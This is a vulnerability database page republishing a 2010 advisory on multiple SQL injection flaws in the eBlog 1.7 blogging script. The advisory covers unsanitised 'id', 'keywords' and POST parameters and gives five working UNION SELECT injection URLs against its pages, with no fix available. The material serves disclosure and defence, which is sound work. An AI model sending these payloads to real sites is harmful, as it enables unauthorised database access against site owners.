Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

eBlog 1.7 SQL Injection

🗓️ 11 Nov 2010 00:00:00Reported by Salvatore FrestaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

eBlog 1.7 SQL Injection Vulnerabilities in eBlog 1.7 allows manipulation of SQL queries through unsanitised parameters such as "id," "keywords," and POST method parameters, potentially leading to arbitrary code injection

Code
`eBlog 1.7 Multiple SQL Injection Vulnerabilities  
  
Name eBlog  
Vendor https://emuci.com  
Versions Affected 1.7  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-11-10  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
  
  
I. ABOUT THE APPLICATION  
________________________  
  
eBlog is a free script that can be used to manage and  
maintain personal blogs.  
  
  
II. DESCRIPTION  
_______________  
  
Some parameters are not sanitised before being used in  
SQL queries.  
  
  
III. ANALYSIS  
_____________  
  
Summary:  
  
A) Multiple SQL Injection  
  
  
A) Multiple SQL Injection  
_________________________  
  
Input passed to "id", "keywords" and to some parameters  
sent via POST method, is not properly sanitised before  
being used in SQL queries. This can be exploited to  
manipulate SQL queries by injecting arbitrary SQL code.  
  
Successful exploitation, only in some cases, requires  
that magic_quotes_gpc is set to Off.  
  
  
IV. SAMPLE CODE  
_______________  
  
A) Multiple SQL Injection  
  
The following sample code don't need requirements.  
  
http://site/path/topics.php?action=ShowComment&id=-1 UNION SELECT 1,2,3,4,5,6,7%23  
  
The following sample codes require that magic_quotes_gpc  
is set to Off:  
  
http://site/path/pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23  
http://site/path/topics.php?action=show&id=-1' UNION SELECT 1,2,3,4,5,6,7,8%23  
http://site/path/sections.php?action=show&id=-1' UNION SELECT 1,2,3,4,5%23  
http://site/path/search.php?keyword=%25' UNION SELECT 1,2,3,4,5,6,7,8%23  
  
  
V. FIX  
______  
  
No fix.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Nov 2010 00:00Current
eblog 1.7sql injectionvulnerabilitiesunsanitised parametersarbitrary code injectionpost method
23